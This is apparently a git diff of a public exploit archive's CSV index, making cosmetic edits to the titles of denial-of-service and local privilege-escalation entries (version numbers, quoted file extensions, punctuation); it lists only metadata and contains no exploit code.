 21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service",2002-01-31,"Luca Papotti",unix,dos,0
 21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0
 21275,platforms/osx/dos/21275.c,"ICQ For Mac OSX 2.6 Client - Denial of Service",2002-02-05,Stephen,osx,dos,0
@ -2680,8 +2680,8 @@ id,file,description,date,author,platform,type,port
 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server - ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos,0
 21739,platforms/windows/dos/21739.pl,"JPEGsnoop 1.5.2 - WriteAV Crash (PoC)",2012-10-04,"Jean Pascal Pereira",windows,dos,0
 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 - '.JLS' File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0
-21746,platforms/windows/dos/21746.c,"Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0
+21746,platforms/windows/dos/21746.c,"Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0
-21747,platforms/windows/dos/21747.txt,"Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0
+21747,platforms/windows/dos/21747.txt,"Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0
 21756,platforms/hardware/dos/21756.txt,"Belkin F5D6130 Wireless Network Access Point - SNMP Request Denial of Service",2002-08-26,wlanman,hardware,dos,0
 21770,platforms/hardware/dos/21770.c,"Cisco VPN 3000 Series Concentrator Client - Authentication Denial of Service",2002-09-03,Phenoelit,hardware,dos,0
 21775,platforms/linux/dos/21775.c,"SWS Simple Web Server 0.0.3/0.0.4/0.1 - New Line Denial of Service",2002-09-02,saman,linux,dos,0
@ -2713,10 +2713,10 @@ id,file,description,date,author,platform,type,port
 21941,platforms/windows/dos/21941.txt,"Polycom 2.2/3.0 - ViaVideo Buffer Overflow",2002-10-15,prophecy.net.nz,windows,dos,0
 21943,platforms/windows/dos/21943.c,"Zone Labs ZoneAlarm 3.0/3.1 - Syn Flood Denial of Service",2002-10-16,"Abraham Lincoln",windows,dos,0
 21949,platforms/unix/dos/21949.txt,"IBM Websphere Caching Proxy 3.6/4.0 - Denial of Service",2002-10-18,Rapid7,unix,dos,0
-21951,platforms/windows/dos/21951.c,"Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (1)",2002-10-22,lion,windows,dos,0
+21951,platforms/windows/dos/21951.c,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (1)",2002-10-22,lion,windows,dos,0
-21952,platforms/windows/dos/21952.c,"Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (2)",2002-10-22,Trancer,windows,dos,0
+21952,platforms/windows/dos/21952.c,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (2)",2002-10-22,Trancer,windows,dos,0
-21953,platforms/windows/dos/21953.txt,"Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (3)",2002-10-18,Rapid7,windows,dos,0
+21953,platforms/windows/dos/21953.txt,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (3)",2002-10-18,Rapid7,windows,dos,0
-21954,platforms/windows/dos/21954.txt,"Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (4)",2002-10-18,anonymous,windows,dos,0
+21954,platforms/windows/dos/21954.txt,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (4)",2002-10-18,anonymous,windows,dos,0
 21963,platforms/windows/dos/21963.pl,"SolarWinds TFTP Server Standard Edition 5.0.55 - Large UDP Packet",2002-10-24,D4rkGr3y,windows,dos,0
 21965,platforms/windows/dos/21965.txt,"Alt-N MDaemon 6.0.x - POP Server Buffer Overflow",2002-10-28,D4rkGr3y,windows,dos,0
 21971,platforms/hardware/dos/21971.txt,"Cisco AS5350 - Universal Gateway Portscan Denial of Service",2002-10-28,"Thomas Munn",hardware,dos,0
@ -2780,7 +2780,7 @@ id,file,description,date,author,platform,type,port
 22245,platforms/windows/dos/22245.txt,"Microsoft Windows NT/2000 - cmd.exe CD Buffer Overflow",2003-02-11,3APA3A,windows,dos,0
 22249,platforms/aix/dos/22249.txt,"IBM AIX 4.3.3/5.1/5.2 libIM - Buffer Overflow",2003-02-12,"Euan Briggs",aix,dos,0
 22250,platforms/multiple/dos/22250.sh,"iParty Conferencing Server - Denial of Service",1999-05-08,wh00t,multiple,dos,0
-22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4 - 'Riched20.dll' Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos,0
+22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4.0 - 'Riched20.dll' Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos,0
 22258,platforms/windows/dos/22258.txt,"Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 - Multiple Vulnerabilities",2012-10-26,shinnai,windows,dos,0
 22259,platforms/linux/dos/22259.c,"BitchX 1.0 - Malformed RPL_NAMREPLY Denial of Service",2003-01-30,argv,linux,dos,0
 22273,platforms/linux/dos/22273.c,"Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (1)",2003-02-23,"Richard Kettlewel",linux,dos,0
@ -3147,7 +3147,7 @@ id,file,description,date,author,platform,type,port
 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0
 24029,platforms/windows/dos/24029.pl,"RhinoSoft Serv-U FTP Server 3.x/4.x/5.0 - LIST Parameter Buffer Overflow",2004-04-20,storm,windows,dos,0
 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - 'YInsthelper.dll' Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0
-24051,platforms/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",windows,dos,0
+24051,platforms/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",windows,dos,0
 24066,platforms/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service",2004-04-27,"Donato Ferrante",multiple,dos,0
 24070,platforms/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",multiple,dos,0
 24078,platforms/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service",2004-05-03,Shadowinteger,linux,dos,0
@ -3688,7 +3688,7 @@ id,file,description,date,author,platform,type,port
 29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",windows,dos,0
 29236,platforms/windows/dos/29236.html,"Microsoft Internet Explorer 7 - CSS Width Element Denial of Service",2006-12-06,xiam.core,windows,dos,0
 29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service",2006-12-15,shinnai,windows,dos,0
-29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer - 'explorer.exe' .WMV File Handling Denial of Service",2006-12-15,shinnai,windows,dos,0
+29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer - 'explorer.exe' '.WMV' File Handling Denial of Service",2006-12-15,shinnai,windows,dos,0
 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0
 29295,platforms/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos,0
 29296,platforms/linux/dos/29296.txt,"KDE LibkHTML 4.2 - NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0
@ -3733,8 +3733,8 @@ id,file,description,date,author,platform,type,port
 29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service",2007-02-27,"Steve Grubb",linux,dos,0
 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (Denial of Service)",2013-11-12,"Necmettin COSKUN",windows,dos,0
 29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0
-29551,platforms/osx/dos/29551.txt,"Apple Mac OSX 10.4.x - iMovie HD .imovieproj Filename Format String",2007-01-30,LMH,osx,dos,0
+29551,platforms/osx/dos/29551.txt,"Apple Mac OSX 10.4.x - iMovie HD '.imovieproj' Filename Format String",2007-01-30,LMH,osx,dos,0
-29553,platforms/osx/dos/29553.txt,"Apple Mac OSX 10.4.x - Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0
+29553,platforms/osx/dos/29553.txt,"Apple Mac OSX 10.4.x - Help Viewer '.help' Filename Format String",2007-01-30,LMH,osx,dos,0
 29554,platforms/osx/dos/29554.txt,"Apple Mac OSX 10.4.x - iPhoto 'photo://' URL Handling Format String",2007-01-30,LMH,osx,dos,0
 29555,platforms/osx/dos/29555.txt,"Apple Mac OSX 10.4.x - Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0
 29558,platforms/windows/dos/29558.c,"Comodo Firewall 2.3.6 - 'CMDMon.SYS' Multiple Denial of Service Vulnerabilities",2007-02-01,"Matousec Transparent security",windows,dos,0
@ -3747,7 +3747,7 @@ id,file,description,date,author,platform,type,port
 29620,platforms/osx/dos/29620.txt,"Apple Mac OSX 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0
 29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0
 29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash (PoC)",2013-11-23,"Akin Tosunlar",windows,dos,0
-29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of Service",2007-02-25,sehato,windows,dos,0
+29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service",2007-02-25,sehato,windows,dos,0
 29660,platforms/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service",2007-02-25,sehato,windows,dos,0
 29664,platforms/windows/dos/29664.txt,"Microsoft Publisher 2007 - Remote Denial of Service",2007-02-26,"Tom Ferris",windows,dos,0
 30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 - URL Protocol Format String",2007-06-12,"Nir Rachmel",multiple,dos,0
@ -4839,7 +4839,7 @@ id,file,description,date,author,platform,type,port
 38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (2)",2015-11-23,"Francis Provencher",windows,dos,0
 38791,platforms/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash (PoC)",2015-11-23,"Antonio Z.",windows,dos,0
 38793,platforms/windows/dos/38793.txt,"Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0
-38794,platforms/windows/dos/38794.txt,"Microsoft Windows Cursor - Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
+38794,platforms/windows/dos/38794.txt,"Microsoft Windows - Cursor Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
 38795,platforms/windows/dos/38795.txt,"Microsoft Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
 38796,platforms/windows/dos/38796.txt,"Microsoft Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
 38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0
@ -4885,7 +4885,7 @@ id,file,description,date,author,platform,type,port
 39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
 40105,platforms/multiple/dos/40105.txt,"Adobe Flash Player 22.0.0.192 - TAG Memory Corruption",2016-07-13,COSIG,multiple,dos,0
 40104,platforms/multiple/dos/40104.txt,"Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption",2016-07-13,COSIG,multiple,dos,0
-39025,platforms/windows/dos/39025.txt,"Microsoft Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
+39025,platforms/windows/dos/39025.txt,"Microsoft Windows Kernel - win32k!OffsetChildren Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
 39026,platforms/win_x86/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Dereference",2015-12-17,"Nils Sommer",win_x86,dos,0
 39027,platforms/win_x86/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free",2015-12-17,"Nils Sommer",win_x86,dos,0
 39037,platforms/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,windows,dos,0
@ -5288,7 +5288,7 @@ id,file,description,date,author,platform,type,port
 40784,platforms/windows/dos/40784.html,"Microsoft Edge - 'FillFromPrototypes' Type Confusion",2016-11-18,"Google Security Research",windows,dos,0
 40785,platforms/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Info Leak",2016-11-18,"Google Security Research",windows,dos,0
 40786,platforms/windows/dos/40786.html,"Microsoft Edge - 'Array.reverse' Overflow",2016-11-18,"Google Security Research",windows,dos,0
-40790,platforms/linux/dos/40790.txt,"Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow",2016-11-18,"Google Security Research",linux,dos,0
+40790,platforms/linux/dos/40790.txt,"Palo Alto Networks PanOS - appweb3 Stack Buffer Overflow",2016-11-18,"Google Security Research",linux,dos,0
 40793,platforms/windows/dos/40793.html,"Microsoft Edge Scripting Engine - Memory Corruption (MS16-129)",2016-11-21,Security-Assessment.com,windows,dos,0
 40797,platforms/windows/dos/40797.html,"Microsoft Edge - 'CTextExtractor::GetBlockText' Out-of-Bounds Read (MS16-104)",2016-11-21,Skylined,windows,dos,0
 40798,platforms/windows/dos/40798.html,"Microsoft Internet Explorer 8 - jscript 'RegExpBase::FBadHeader' Use-After-Free (MS15-018)",2016-11-21,Skylined,windows,dos,0
@ -5437,6 +5437,7 @@ id,file,description,date,author,platform,type,port
 41792,platforms/multiple/dos/41792.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",multiple,dos,0
 41797,platforms/macos/dos/41797.c,"Apple macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",macos,dos,0
 41794,platforms/multiple/dos/41794.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
 41826,platforms/hardware/dos/41826.txt,"Cesanta Mongoose OS - Use-After-Free",2017-04-06,"Compass Security",hardware,dos,0
 41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0
 41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0
 41790,platforms/macos/dos/41790.c,"Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0
@ -5460,6 +5461,7 @@ id,file,description,date,author,platform,type,port
 41812,platforms/multiple/dos/41812.html,"Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
 41813,platforms/multiple/dos/41813.html,"Apple WebKit - 'table' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
 41814,platforms/multiple/dos/41814.html,"Apple WebKit - 'WebCore::toJS' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
 41823,platforms/windows/dos/41823.py,"CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)",2017-03-16,redr2e,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5510,7 +5512,7 @@ id,file,description,date,author,platform,type,port
 205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation",2000-11-29,Tlabs,linux,local,0
 206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0
 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0
-209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0
+209,platforms/linux/local/209.c,"GLIBC - '/bin/su' Privilege Escalation",2000-11-30,localcore,linux,local,0
 210,platforms/solaris/local/210.c,"Solaris locale - Format Strings (noexec stack) Exploit",2000-11-30,warning3,solaris,local,0
 215,platforms/linux/local/215.c,"GLIBC locale - bug mount Exploit",2000-12-02,sk8,linux,local,0
 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0
@ -5816,7 +5818,7 @@ id,file,description,date,author,platform,type,port
 2412,platforms/windows/local/2412.c,"Microsoft Windows Kernel - Privilege Escalation (MS06-049)",2006-09-21,SoBeIt,windows,local,0
 2463,platforms/osx/local/2463.c,"Apple Mac OSX 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,osx,local,0
 2464,platforms/osx/local/2464.pl,"Apple Mac OSX 10.4.7 - Mach Exception Handling Local Exploit (10.3.x)",2006-09-30,"Kevin Finisterre",osx,local,0
-2466,platforms/linux/local/2466.pl,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation",2006-10-01,"Clint Torrez",linux,local,0
+2466,platforms/linux/local/2466.pl,"cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation",2006-10-01,"Clint Torrez",linux,local,0
 2492,platforms/linux/local/2492.s,".ELF Binaries - Privilege Escalation",2006-10-08,Sha0,linux,local,0
 2543,platforms/solaris/local/2543.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0
 2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0
@ -5839,7 +5841,7 @@ id,file,description,date,author,platform,type,port
 2873,platforms/windows/local/2873.c,"AtomixMP3 < 2.3 - '.m3u' Buffer Overflow",2006-11-30,"Greg Linares",windows,local,0
 2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player 2.1 - Malformed '.PLF' Buffer Overflow (PoC)",2006-12-01,"Greg Linares",windows,local,0
 2950,platforms/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,windows,local,0
-3024,platforms/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError Csrss.exe Memory Disclosure",2006-12-27,"Ruben Santamarta",windows,local,0
+3024,platforms/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure",2006-12-27,"Ruben Santamarta",windows,local,0
 3070,platforms/osx/local/3070.pl,"VideoLAN VLC Media Player 0.8.6 (x86) - (udp://) Format String",2007-01-02,MoAB,osx,local,0
 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation",2007-01-03,erasmus,windows,local,0
 3087,platforms/osx/local/3087.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,osx,local,0
@ -6668,7 +6670,7 @@ id,file,description,date,author,platform,type,port
 14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",windows,local,0
 14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 - 'wintab32.dll' DLL Hijacking",2010-08-25,CCNA,windows,local,0
 14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous",windows,local,0
-14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
+14778,platforms/windows/local/14778.c,"Microsoft Windows - Contacts 'wab32res.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
 14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking",2010-08-25,ALPdaemon,windows,local,0
 14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
 14782,platforms/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
@ -6929,7 +6931,7 @@ id,file,description,date,author,platform,type,port
 17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Privilege Escalation",2011-06-11,"Dan Rosenberg",linux,local,0
 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat' Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local,0
 17449,platforms/windows/local/17449.py,"FreeAmp 2.0.7 - '.pls' Buffer Overflow",2011-06-24,"C4SS!0 G0M3S",windows,local,0
-17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (MS10-028) (Metasploit)",2011-06-26,Metasploit,windows,local,0
+17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll' '.DXF' File Handling (MS10-028) (Metasploit)",2011-06-26,Metasploit,windows,local,0
 17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0
 17473,platforms/windows/local/17473.txt,"Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion Exploit",2011-07-03,Snake,windows,local,0
 17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 - '.RTF' Header Stack Overflow",2011-07-03,Snake,windows,local,0
@ -7363,7 +7365,7 @@ id,file,description,date,author,platform,type,port
 19912,platforms/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - /tmp Symlink",2000-05-10,foo,multiple,local,0
 19915,platforms/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd - SHELL Environmental Variable",2000-05-16,Sebastian,linux,local,0
 19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0
-19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler .XML Privilege Escalation (MS10-092) (Metasploit)",2012-07-19,Metasploit,windows,local,0
+19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler '.XML' Privilege Escalation (MS10-092) (Metasploit)",2012-07-19,Metasploit,windows,local,0
 19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0
 19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink",2000-04-21,anonymous,linux,local,0
 19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0
@ -7441,17 +7443,17 @@ id,file,description,date,author,platform,type,port
 20213,platforms/aix/local/20213.txt,"AIX 4.2/4.3 - netstat -Z Statistic Clearing",2000-09-03,"alex medvedev",aix,local,0
 20542,platforms/windows/local/20542.rb,"GlobalScape CuteZIP - Stack Buffer Overflow (Metasploit)",2012-08-15,Metasploit,windows,local,0
 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Privilege Escalation",2000-06-24,"Stephen J. Friedl",sco,local,0
-20232,platforms/windows/local/20232.cpp,"Microsoft Windows NT 4/2000 - DLL Search Path",2000-09-18,"Georgi Guninski",windows,local,0
+20232,platforms/windows/local/20232.cpp,"Microsoft Windows NT 4.0/2000 - DLL Search Path",2000-09-18,"Georgi Guninski",windows,local,0
 20241,platforms/palm_os/local/20241.txt,"Palm OS 3.5.2 - Weak Encryption",2000-09-26,@stake,palm_os,local,0
 20250,platforms/linux/local/20250.c,"LBL Traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0
 20251,platforms/linux/local/20251.c,"LBL Traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0
 20252,platforms/linux/local/20252.c,"LBL Traceroute 1.4 a5 - Heap Corruption (3)",2000-09-28,"Michel Kaempf",linux,local,0
 20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - fstat Format String",2000-10-04,K2,openbsd,local,0
-20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0
+20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0/2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0
 20543,platforms/windows/local/20543.rb,"Microsoft Windows - Service Trusted Path Privilege Escalation (Metasploit)",2012-08-15,Metasploit,windows,local,0
 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (2)",2012-08-05,pole,windows,local,0
 20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 - Permissions File Manipulation",1995-03-02,"Larry Glaze",irix,local,0
-20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request (MS00-003)",2000-10-03,"BindView's Razor Team",windows,local,0
+20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0/2000 - Spoofed LPC Request (MS00-003)",2000-10-03,"BindView's Razor Team",windows,local,0
 20274,platforms/multiple/local/20274.pl,"IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local,0
 20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal - 'iplncal.sh' Permissions",2000-10-10,@stake,solaris,local,0
 20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart'",2000-10-10,@stake,solaris,local,0
@ -7627,7 +7629,7 @@ id,file,description,date,author,platform,type,port
 21117,platforms/multiple/local/21117.txt,"Progress Database 8.3/9.1 - Multiple Buffer Overflow",2001-10-05,kf,multiple,local,0
 21120,platforms/unix/local/21120.c,"Snes9x 1.3 - Local Buffer Overflow",2001-10-16,"Niels Heinen",unix,local,0
 21124,platforms/linux/local/21124.txt,"Linux Kernel 2.2 / 2.4 - Ptrace/Setuid Exec Privilege Escalation",2001-10-18,"Rafal Wojtczuk",linux,local,0
-21130,platforms/windows/local/21130.c,"Microsoft Windows NT 3/4 - CSRSS Memory Access Violation",2001-10-26,"Michael Wojcik",windows,local,0
+21130,platforms/windows/local/21130.c,"Microsoft Windows NT 3/4.0 - CSRSS Memory Access Violation",2001-10-26,"Michael Wojcik",windows,local,0
 21139,platforms/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 - Client Importer Buffer Overflow (Metasploit)",2012-09-08,Metasploit,windows,local,0
 40418,platforms/windows/local/40418.txt,"Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation",2016-09-23,Tulpa,windows,local,0
 21150,platforms/unix/local/21150.c,"Rational ClearCase 3.2/4.x - DB Loader TERM Environment Variable Buffer Overflow",2001-11-09,virtualcat,unix,local,0
@ -7648,7 +7650,7 @@ id,file,description,date,author,platform,type,port
 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 - gunzip Race Condition",2002-02-08,"Larry Cashdollar",unix,local,0
 21247,platforms/linux/local/21247.c,"BRU 17.0 - SetLicense Script Insecure Temporary File Symbolic Link",2002-01-26,"Andrew Griffiths",linux,local,0
